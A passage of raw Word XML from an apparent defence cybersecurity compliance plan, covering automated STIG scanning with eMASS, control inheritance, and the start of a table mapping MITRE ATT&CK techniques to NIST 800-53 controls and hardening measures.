    </w:p>
    <w:p w14:paraId="46EEC7CE" w14:textId="045E5166" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set automation platforms to run scheduled, non-disruptive STIG scans across the authorization boundary. The tool packages these results and pushes them to eMASS on an ongoing basis, maintaining an active, near-real-time scorecard rather than relying on manual uploads before an audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3CF510" w14:textId="76F210AA" w:rsidR="00D66D8A" w:rsidRPr="000B6E74" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B6E74">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Inherit Common Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376ABAD7" w14:textId="20E136E5" w:rsidR="00D66D8A" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use the eMASS inheritance architecture to link automated boundary packages to downstream network systems. Once the boundary defense controls have been verified, validated, and automated, internal sub-networks can inherit those secure baselines, implement and enforce them, thereby reducing manual documentation efforts across Commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68D947" w14:textId="6DD1C6BC" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Automated POA&amp;M Strategy and Mapping to the MITRE ATT&amp;CK Framework Adversarial Tactics, Techniques, and Procedures (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F82CD0" w14:textId="2C15364A" w:rsidR="000B6E74" w:rsidRPr="00DF2381" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2381">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Table X.X</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1695"/>
        <w:gridCol w:w="2619"/>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="3209"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B6E74" w14:paraId="2590034B" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E879082" w14:textId="2F315C34" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="00DF2381">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41BFB626" w14:textId="7C22E7C7" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="00DF2381">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1663D62A" w14:textId="414196A0" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="00DF2381">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Primary NIST 800-53r5 Control(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72BBB15C" w14:textId="11C4465A" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="00DF2381">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Automated Remediation &amp; Hardening Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="3D446A53" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20DB2B3D" w14:textId="2E24D308" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40100155" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1189:</w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Drive-by</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52247F11" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13169895" w14:textId="53F383B1" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1566:</w:t>
            </w:r>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5928A3C3" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6162448D" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DC844B" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76FD4863" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IA-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A247BEB" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38F8A961" w14:textId="2F5BFCC8" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SI-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="121D726A" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Enforce phishing-resistant MFA (FIDO2/CAC/PIV).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A56AE92" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="195DC1A4" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Automate endpoint blocking via EDR APIs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0709DF65" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70F1CB1C" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64E8424D" w14:textId="3A02D2CC" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Disable macro execution via GPO/Desired State Configuration (DSC).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B6E74" w14:paraId="1BD01423" w14:textId="77777777" w:rsidTr="00DF2381">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04AFD0A4" w14:textId="014D66CD" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2619" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67E3D8ED" w14:textId="2FC419AB" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B6E74">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1592:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Gather Host-Victim Information (Account Discovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1827" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66B7F752" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6D9C17" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC-6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1A2DC5" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B3DBE5E" w14:textId="1F190DDF" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3209" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5750D8EB" w14:textId="77777777" w:rsidR="000B6E74" w:rsidRPr="000B6E74" w:rsidRDefault="000B6E74" w:rsidP="000B6E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
